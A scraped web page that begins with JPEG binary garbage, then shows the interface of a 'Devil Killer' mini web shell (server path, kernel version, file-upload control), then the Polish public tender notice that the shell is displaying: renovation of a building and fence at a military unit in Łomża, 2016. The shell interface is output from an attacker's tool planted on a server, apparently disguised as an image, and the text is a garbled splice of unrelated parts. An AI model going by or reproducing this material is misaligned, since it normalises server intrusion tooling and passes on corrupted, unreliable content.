JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160225/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160225/42588-N-2016.html

<p class="kh_header"><b>Białystok: Remont budynku nr 10 wraz z ogrodzeniem na terenie JW w Łomży</b><br>
<b>Numer ogłoszenia: 42588 - 2016; data zamieszczenia: 25.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 25 Wojskowy Oddział Gospodarczy w Białymstoku , ul. Kawaleryjska 70, 15-601 Białystok, woj. podlaskie, tel. 261 398 839, faks 261 398 813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.25wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku nr 10 wraz z ogrodzeniem na terenie JW w Łomży.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.Przedmiotem zamówienia jest Remont budynku nr 10 wraz z ogrodzeniem na terenie JW w Łomży

Remont budynku Nr 10 wraz z ogrodzeniem  na terenie JW w Łomży
CPV: 45000000-7 Roboty budowlane

45453000-7    Roboty remontowo renowacyjne
45324000-4    Roboty w zakresie okładzin
45432120-1    Instalowanie nawierzchni podłogowych
45421000-4    Roboty w zakresie stolarki budowlanej
45340000-2    Instalowanie ogrodzeń, płotów i sprzętu ochronnego
45332000-3    Roboty instalacyjne wodne i kanalizacyjne
45310000-3    Roboty instalacyjne elektryczne
Roboty przygotowawcze i demontażowe CPV 45453000-7
zdjęcie tablic bhp i p. poż. do ponownego zamontowania; 
ługowanie farby olejnej z tynków ścian, lub impregnacja ścian szkłem wodnym;
ręczne wykucie z muru wsporników, kratek wentylacyjnych, końców balustrad itp.
rozebranie elementów betonowych niezbrojonych grub. ponad 15 cm. rozebranie posadzki betonowej i podkładu grub. 35 cm; 
rozebranie ogrodzenia z siatki na słupkach z rur stalowych obetonowanych. Ogrodzenie i bramy wjazdowe z furtkami na słupkach stalowych zakończone drutem kolczastym mocowanym do  wsporników  w  ilości 4 linki;
rozebranie betonowych czapek kominowych;
odbicie tynków wewnętrznych z zaprawy cementowej o pow. ponad 5m2 na: stropach płaskich, belkach, biegach klatek schodowych. przyjęto 20% 
do całkowitej powierzchni sufitów;
zerwanie posadzek z tworzyw sztucznych;
zerwanie posadzek cementowych i lastrykowych z cokolikami. posadzki 
na schodach;
wykucie z muru ościeżnic drewnianych o powierzchni ponad 2,0m2;
rozebranie ścianki z cegły grubości 1/2 cegły na zaprawie wapiennej;
rozebranie poręczy ochronnych rurowych i z kątowników;
ręczne wykucie z muru krat o powierzchni ponad 2 m2 nienadających się 
do ponownego wbudowania;
wykucie kątowników 45 x 45 ze stopni schodowych ;
wykucie z muru stalowych  krat. wykucie krat osiatkowanych do ponownego zamontowania;
rozebranie krawężników betonowych o wymiarach 15x30cm na podsypce cementowo-piaskowej;
wywóz gruzu z rozbieranych konstrukcji samochodami samowyładowczymi.

Roboty budowlano montażowe  CPV 45324000-4; 45432120-1; 45421000-4; 4534000-2.
uzupełnienie ścian lub zamurowanie otworów cegłami, bloczkami z betonu komórkowego;
ściany z cegły na zaprawie cementowo-wapiennej;
izolacje z papy asfaltowej na sucho poziome ze smarowaniem zakładów;
wykonanie nadproży stalowych z kształtownika walcowanego dł. 1,20 m 
z owinięciem siatką cięto ciągnioną;
przemurowanie przewodów kominowych; odgruzowanie przewodów;
kratki wentylacyjne prostokątne w kanałach murowanych o obwodzie 
do 800 mm  PCV;
zeskrobaniem starej farby i przecieranie tynków wewnętrznych na: stropach, klatkach schodowych  i ścianach;
uzupełnienie tynków zwykłych wewnętrznych kat. III, stropów płaskich, belek, podciągów, biegów i spoczników schodowych o pow. ponad 5m2 w jednym miejscu;
wykonanie tynków zwykłych cem - wap. kat. III na ścianach i stropach;
licowanie ścian i słupów płytkami z kamieni sztucznych na zaprawie klejowej,
licowanie ścian o pow. do 5 m2 płytkami glazurowanymi na zaprawie klejowej;
podsypka piaskowa o grubości 5 cm zagęszczana ręcznie;
podkłady betonowe na podłożu gruntowym z betonu B-20 grubość 15 cm;
gruntowanie podłoży preparatami  - powierzchnie pionowe i poziome;
posadzki cementowe - zbrojenie posadzki siatką stalową;
posadzki cementowe, posadzka cementowa wypalana o śr. grub. do 40 mm. z zaprawy cementowej  80  zatarta  mechanicznie na gładko 
z wykonaniem dylatacji przez nacięcie piłą z wypełnieniem szczelin dylatacyjnych i odizolowaniem taśmą od ścian. (posadzka przemysłowa);
posadzki płytkowe z kamieni sztucznych układanych na klej - przygotowanie powierzchni;
warstwy  wyrównujące  i wygładzające z zaprawy samopoziomującej gr. 5 mm wykonywane w pomieszczeniach pow. powyżej 8,00 m2;
posadzki z wykładzin z tworzyw sztucznych z warstwą izolacyjną - rulonowe na kleju dyspersyjnym szybkowiążącym. wykładziny twarde z wywinięciem 10 cm na ścianie oraz konserwacją po 3 miesiącach;
posadzki z wykładzin z tworzyw sztucznych - zgrzewanie wykładzin rulonowych;
wyrównanie do jednakowej wysokości i szerokości  wszystkich stopni na klatce schodowej parter - piętro;
przygotowanie podłoża pod płytki posadzkowe;
okładziny z płytek z kamieni sztucznych układanych na klej;
oczyszczenie stopni schodowych kamiennych po przez piaskowanie, 
lub ogniowanie lub młotkowanie;
poręcze schodów, poręcze ze stali nierdzewnej mocowane do ścian - wsporniki ze stali nierdzewnej;
wymiana okien zespolonych na okna uchylne jednodzielne z PCV o powierzchni do 0,6m2; patrz załącznik Nr 1 do ST; 
podokienniki i półki o szer. do 50 cm z płyt z konglomeratów kamiennych na spoiwie poliestrowym. szerokość powyżej 50 cm;
wymiana okien zespolonych na okna uchylne jednodzielne z PCV 
o powierzchni ponad 1,00 m2  i ponad 2,50 m2, mocowane na dyble; patrz załącznik Nr 1 do ST;
obróbki blacharskie podokienników blacha powlekana do 33 cm;
opalanie farby olejnej z powierzchni metalowych pełnych;
malowanie prostych balustrad i krat farbą olejną - oczyszczenie z brudu, zaprawy i rdzy, czyszczenie po opaleniu farby;
miniowanie krat i balustrad z prętów;
malowanie krat i z prętów prostych;
osadzenie ościeżnic, krat i balustrad metalowych oraz podokienników i stopni schodowych;
drzwi stalowe pełne o powierzchni ponad 2m2.  zewnętrzne z ościeżnicą, ocieplone, antywłamaniowe RC5 kolor ustalić z inwestorem podczas wymiany, ryglowane jedno  skrzydło dołem i górą, dwa zamki wewnętrzne klasy 
c + zabezpieczenie przeciwwyważeniowe;
drzwi stalowe pełne o powierzchni ponad 2,00 m2 zewnętrzne z ościeżnicą, ocieplone, antywłamaniowe  RC5 kolor ustalić z inwestorem podczas wymiany, dwa zamki wewnętrzne klasy C + zabezpieczenie przeciwwyważeniowe;
drzwi stalowe pełne o powierzchni ponad 2m2. drzwi wewnętrzne dwuskrzydłowe (techniczne), kolor ustalić z inwestorem podczas wymiany. ryglowanie jednego  skrzydła dołem i górą, jeden zamek patentowy;
drzwi stalowe pełne o powierzchni ponad 2m2. drzwi wewnętrzne dwuskrzydłowe, kolor ustalić z inwestorem  podczas  wymiany  ryglowanie  jednego   skrzydła  od wewnątrz dołem i górą, dwa zamki patentowe klasy C, antywłamaniowe, zabezpieczenie przeciwwyważeniowe;
ościeżnice systemowe do drzwi wewnętrznych okleinowanych;
skrzydła drzwiowe wewnętrzne fabrycznie wykończone;
skrzydła drzwiowe płytowe szklone, wewnętrzne fabrycznie wykończone - 
drzwi łazienkowe;
zabezpieczenie podłóg i stolarki folią;
demontaż i ponowny montaż czujek alarmowych oraz innych urządzeń alarmowych;
malowanie ścian i stropów farbą wewnętrzną;
deskowanie  czapek kominowych;  
uzupełnienie betonu w czapkach kominowych;
wykonanie tynków zwykłych na kominach; 
malowanie dwukrotne farbami emulsyjnymi starych tynków na kominach; 
pokrycie papą  termozgrzewalną grub. 5,2 mm czapek kominowych;
ręczne roboty ziemne z odspojeniem i przewozem gruntu kat. III i na odległość do 10m;
ręczne formowanie nasypów z gruntu kat. III-IV dostarczanego z odkładu;
ręczne wykonanie trawników dywanowych siewem na skarpach 
ogrodzenie z prefabrykowanych paneli stalowych z drutu grub. 5 mm 
o oczkach 50 x 200mm. Wysokości 2,00 m na słupkach z rur kwadratowych, ze stali konstrukcyjnej o min. wymiarach 60 x 40 x 3 mm (profil zamknięty  przed malowaniem) zagłębionych poniżej strefy przemarzania. U góry drut kolczasty lub ostrzowy na wspornikach z kątownika w dwie strony, o przekroju 30 x 30 x 3 mm mocowany  w odstępach co 15 cm. podmurówka prefabrykowana żelbetowa. Malowanie proszkowe kolor grafit RAL 7024. Usztywnienie dwoma skosami w każdym załamaniu i minimum co 10-ty słupek o rozstawie słupków 2,5 m; patrz załącznik  Nr 2 do ST ;
wsporniki proste ze stali kontowej malowane proszkowo w kolorze grafit - mocowane do słupków pod kątem 45 stopni w obie strony (do wewnątrz i na zewnątrz). Wsporniki podwyższają ogrodzenie do wysokości 2,40 m;
wrota i furtki z materiałów jak ogrodzenie.  Zamki lub kłódki patentowe;
brama główna szerokość 9,25 m, brama składa się z 4-ech części, każde 
z 2-uch skrzydeł pośrodku winne mieć zawiasy do składania w harmonijkę. Zamknięcie patentowe plus kłódka patentowa. Dodatkowe rygle przy zawiasach do usztywnienia po zamknięciu;
ława pod krawężniki ze zwykłej mieszanki betonowej;
krawężniki betonowe wystające o wym. 15x30 cm na podsypce cem.-piaskowej
obsługa geodezyjna.
Instalacje elektryczne demontaż CPV 45310000-3
Demontaż instalacji elektrycznych - przewodów elektrycznych, wyłączników, przełączników, gniazd 230V, opraw oświetleniowych, gniazd siłowych i tablic rozdzielczych.
Instalacje elektryczne montaż CPV 45310000-3
oprawy oświetleniowe zawieszane, przykręcane świetlówkowe, belka montażowa demontaż;
wymiana łącznika nieuszczelnionego natynkowego; przełącznika schodowego,  krzyżowego;
demontaż tablicy rozdzielczej o powierzchni do 0,5m2;
gniazda instalacyjne wtykowe uszczelnione trójbiegunowe - demontaż;
linie zasilające prowadzone w rurach instalacyjnych stalowych na tynku. Demontaż bez względu na rodzaj, ilość i przekrój przewodów w rurze;
wykucie bruzd dla przewodów wtynkowych i rur;
zaprawianie bruzd szerokości do 150mm;
przebijanie otworów w ścianach lub stropach - otwory o średnicy 25mm 
i długości do 2 1/2 cegły przebijane w podłożu ceglanym;
przygotowanie podłoża pod osprzęt instalacyjny; 
mocowanie osprzętu na zaprawie cementowej lub gipsowej; wykonanie ślepych otworów;
puszki instalacyjne podtynkowe o średnicy do 80mm, 4 - wylotowe;
przewody kabelkowe układane p.t. w gotowych bruzdach o łącznym przekroju żył 7,5 do 30 mm2, układany na podłożu innym niż betonowe;
oprawy pyłoodporne w obudowie z tworzyw sztucznych o źródle światła powyżej 2x20W; 
łącznik podtynkowy krzyżowy, dwubiegunowy w puszce instalacyjnej;
gniazda instalacyjne wtyczkowe ze stykiem ochronnym, wodoszczelne, 3-bieg. do 32A/10mm2;
aparaty elektryczne o masie do 2,5kg.
Instalacje wod. - kan. i c.o. Demontaż CPV 45332000-3
przebicia w ścianach z cegły na zaprawie cementowo-wapiennej;
wykucie bruzd poziomych o głębokości i szerokości 1-4 x 1-2 cegły 
w ścianach z cegieł na zaprawie cementowo-wapiennej;
demontaż rurociągu stalowego ocynkowanego, czarnego i z PCV na ścianie 
o średnicy 15-50mm;
demontaż zaworów czerpalnych, hydrantów, baterii umywalkowych i baterii 
z natryskiem;
demontaż skrzynek hydrantowych ściennych;
demontaż rurociągu kanalizacyjnego, średnicy do 150mm;
demontaż wanienek do mycia nóg ; 
demontaż grzejników żeliwnych - członowych i rurowych;
demontaż urządzeń sanitarnych: umywalki porcelanowej, pisuaru, ustępu 
z miską porcelanową;
Instalacje wod. - kan. i c.o. - Montaż CPV 45332000-3
rurociągi z tworzyw sztucznych (PP, PE, PB) o połączeniach zgrzewanych 
na ścianach od 20 do 63 mm; 
otuliny termoizolacyjne z pianki polietylenowej z nacięciem wzdłużnym grubości 9mm, na rurociągu;
baterie umywalkowe stojące mieszaczowe jednouchwytowe;
baterie  natryskowe ścienne z przesuwnym natryskiem;
zawór hydrantowy we wnęce o średnicy  nominalnej 52mm;
zawór przelotowy kulowy prosty  wzmocniony o średnicy nominalnej 15- 32mm; 
kształtki z tworzyw sztucznych;
zawory czerpalne,  
dodatki za podejścia dopływowe, w rurociągach z tworzyw sztucznych;
szafki, drzwiczki i skrzynki do hydrantów i zaworów; 
płukanie instalacji wodociągowej w budynku; 
bakteriologiczne  i fizykochemiczne badanie wody;
wymiana dołącznika (trapera); 
rurociągi kanalizacyjne z PVC-S wzmocnione w gotowych wykopach wewnątrz budynków;
wpusty ściekowe z tworzywa sztucznego z kratką ze stali nierdzewnej - średnica 50 mm;
czyszczaki kanalizacyjne  z PVC średnicy 75 i 110mm o połączeniu wciskowym;
rury wywiewne  z PVC średnicy 75mm o połączeniu wciskowym;
umywalki pojedyncze i łączone szeregowo w kolorze białym;
ustępy z płuczką ustępową typu kompakt w kolorze białym;
brodziki natryskowe akrylowe w kolorze białym z syfonem samoczyszczącym;
pisuary pojedyncze w kolorze białym z automatycznym zaworem spłukującym;
zawór przelotowy prosty, mosiężny Dn=50mm wzmocniony o połączeniach gwintowanych;
rury przyłączeniowe z tworzyw sztucznych do grzejników;
grzejniki aluminiowe członowe o powierzchni grzewczej 5,0-7,5m2;
otuliny termoizolacyjne z pianki polietylenowej z nacięciem podłużnym 
(na ścianach) oraz pod płaszczem z folii (w posadzce);
zawory termostatyczne do regulacji c.o. wraz z głowicą termostatyczną  Dn=15mm;
zawory grzejnikowe powrotne Dn=15;
próby i regulacje instalacji centralnego ogrzewania.

UWAGA: 
Szczegółowy zakres robót do realizacji określa niniejszy opis przedmiotu zamówienia, specyfikacja techniczna wykonania i odbioru robót oraz przedmiar robót branży budowlanej, sanitarnej i elektrycznej. 
Przyjęte w opisach technologie i materiały podające producentów określają wymagania techniczne i dopuszcza się stosowanie zamienników materiałowych, które nie obniżą wartości użytkowej i jakościowej wykonanych elementów zamówienia.

Warunki realizacji robót:
1.	Roboty będą wykonywane w czynnym zakładzie w dni powszednie 
od poniedziałku do piątku w godzinach 700 do 1500, w innych godzinach oraz 
w pozostałe dni tylko po pisemnym zaakceptowaniu przez Komendanta 
25 WOG oraz Użytkownika. 
2.	Obowiązkiem wykonawcy przed rozpoczęciem robót jest dostarczenie 
wykaz sprzętu i listy pracowników  uczestniczących w zadaniu celem wykonania przepustek przez służby ochrony. 
3.	Wykonawca/Podwykonawca zatrudniający obcokrajowców, przed rozpoczęciem przez nich prac, ma obowiązek zgłoszenia ich do Służby Kontrwywiadu Wojskowego zgodnie Decyzją Nr 21 Ministra Obrony Narodowej z dnia 10.02.2012 roku w sprawie planowania i realizowania przedsięwzięć współpracy międzynarodowej w resorcie obrony narodowej (Dz. Urz. MON poz. 33). Po uzyskaniu stosownego zezwolenia wydanego przez Służbę Kontrwywiadu Wojskowego, Wykonawca/Podwykonawca ma obowiązek przedstawić niezwłocznie dokument Zamawiającemu.
4.	Wykonawca robót (kierownik budowy) w pełni odpowiada za bezpieczeństwo 
i higienę pracy  w miejscu realizacji robót  oraz za zachowanie bezpieczeństwa pożarowego.
5.	Kierownik (budowy) robót powinien posiadać uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej oraz aktualną przynależność do właściwej izby samorządu zawodowego.
6.	Roboty należy prowadzić zgodnie z Rozporządzeniem Ministra Infrastruktury 
z dnia 06.02.2003 r. (Dz. U. 2003 Nr 47 poz. 401) w sprawie bezpieczeństwa 
i higieny pracy podczas wykonywania robót budowlanych.
7.	Wykonawca zobowiązany jest pokryć koszty zużycia energii elektrycznej, wody oraz odprowadzania ścieków związane z potrzebami wynikającymi 
w trakcie realizacji zadania.
8.	Wykonawca jest zobowiązany wykonywać roboty budowlane zgodnie 
z przepisami prawa budowlanego, zgłaszać do odbioru roboty zanikające 
i ulegające zakryciu.
9.	Wykonawca powinien przygotować zadanie do przekazania, wykonać do dnia odbioru i przedstawić Zamawiającemu komplet dokumentów budowy wymagany przepisami prawa budowlanego.
10.	Materiały pochodzące z rozbiórki posegregować wg. rodzaju i grupy. Materiały zaklasyfikowane jako odpady - surowce wtórne (żeliwo, stal, miedź, mosiądz, itp.) Wykonawca zagospodaruje we własnym zakresie zgodnie z ustawą 
o odpadach, przy czym wartość uzyskaną z przekazania złomu należy uwzględnić w kosztorysie ofertowym jako pomniejszenie wartości oferty. Wartość złomu należy przyjąć jako iloczyn ceny jednostkowej złomu i ilości wynikającej z pozycji przedmiarowych. Pozostałe odpady Wykonawca, który 
w świetle ustawy o odpadach jest wytwórcą odpadu, zagospodaruje we własnym zakresie. Koszty zagospodarowania odpadów ponosi Wykonawca. 
W przypadku wytworzenia przez Wykonawcę w czasie prac odpadów niebezpiecznych należy dostarczyć Zamawiającemu Kartę Przekazania Odpadu (KPO) w celu poinformowania o sposobie zagospodarowania tych odpadów. Powstałe w wyniku prac budowlanych nieczystości płynne (zlewki, popłuczyny, itp.) Wykonawca gromadzi w szczelnych pojemnikach i wywozi na własny koszt poza teren Jednostki.
11.	Wykonawca zabezpieczy teren prowadzenia robót na czas trwania realizacji zadania aż do zakończenia i odbioru ostatecznego robót na własny koszt.
12.	Zamawiający dopuszcza powierzenie części zamówienia podwykonawcom i jednocześnie żąda wskazania przez Wykonawcę w ofercie, którą część zamówienia zamierza powierzyć podwykonawcom zgodnie z art. 36b ustawy Pzp.  W Załączniku do SIWZ (Projekt umowy) w § 9 Zamawiający określa zasady powierzenia części zamówienia podwykonawcom. 

Wizja lokalna!!!

Termin wizji lokalnej ustala się na dzień: 03 marca 2016 roku na godz. 10.00. Osobą odpowiedzialną za przeprowadzenie wizji i kontakt z Wykonawcami zainteresowanymi jest p. Jan GROMAK tel. 261-385-509. 
Jednocześnie Zamawiający informuje, że udział w wizji lokalnej w/w obiektu nie jest obowiązkowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.32.40.00-4, 45.43.21.20-1, 45.42.10.00-4, 45.34.00.00-2, 45.33.20.00-3, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy Pzp. 
2. Każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości 
20 000,00 zł (słownie: dwadzieścia tysięcy złotych)
1.Wadium powinno być wniesione przed upływem terminu składania ofert (powinno znaleźć się na koncie Zamawiającego przed otwarciem ofert).
2.	Wadium może być wnoszone w jednej lub w kilku następujących formach: 
pieniądzu;
poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 

Wadium wniesione w pieniądzu należy wpłacać na rachunek bankowy Zamawiającego prowadzony przez NBP O/O Białystok nr konta 
61 1010 1049 0050 7613 9120 2000 z dopiskiem Wadium w postępowaniu  3/PN/2016 - Remont budynku nr 10 wraz z ogrodzeniem na terenie JW w Łomży.

3.	Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. Zarówno kserokopia dowodu bankowego jak i dowodu pochodzącego z systemu elektronicznych rozliczeń - wymaga potwierdzenia przez Wykonawcę za zgodność z oryginałem. 

4.	Wadium (oryginał dokumentu) wnoszone w pozostałych formach, należy złożyć w Kancelarii 25 Wojskowego Oddziału Gospodarczego w Białymstoku, w kopercie zapewniającej nienaruszalność dokumentu. Kopię dokumentu należy załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od Wykonawców udowodnienia faktu posiadania uprawnień do wykonywania określonej działalności lub czynności, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 Ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy 
i doświadczenia, jeśli udokumentuje poprzez złożenie wykazu robót budowlanych,  wykonanie, w okresie ostatnich pięciu lat przed upływem 
terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, co najmniej dwie roboty ogólnobudowlane, o wartości
minimum 500 000,00 zł brutto, wraz z podaniem jej rodzaju i wartości, daty 
i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;  takim dowodem może być poświadczenie lub inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze, Wykonawca nie jest w stanie uzyskać poświadczenia.

Dowodami potwierdzającymi, że roboty budowlane zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone są:
a)	poświadczenie, 
b)	inny dokument - jeżeli z uzasadnionych przyczyn o obiektywnym  charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
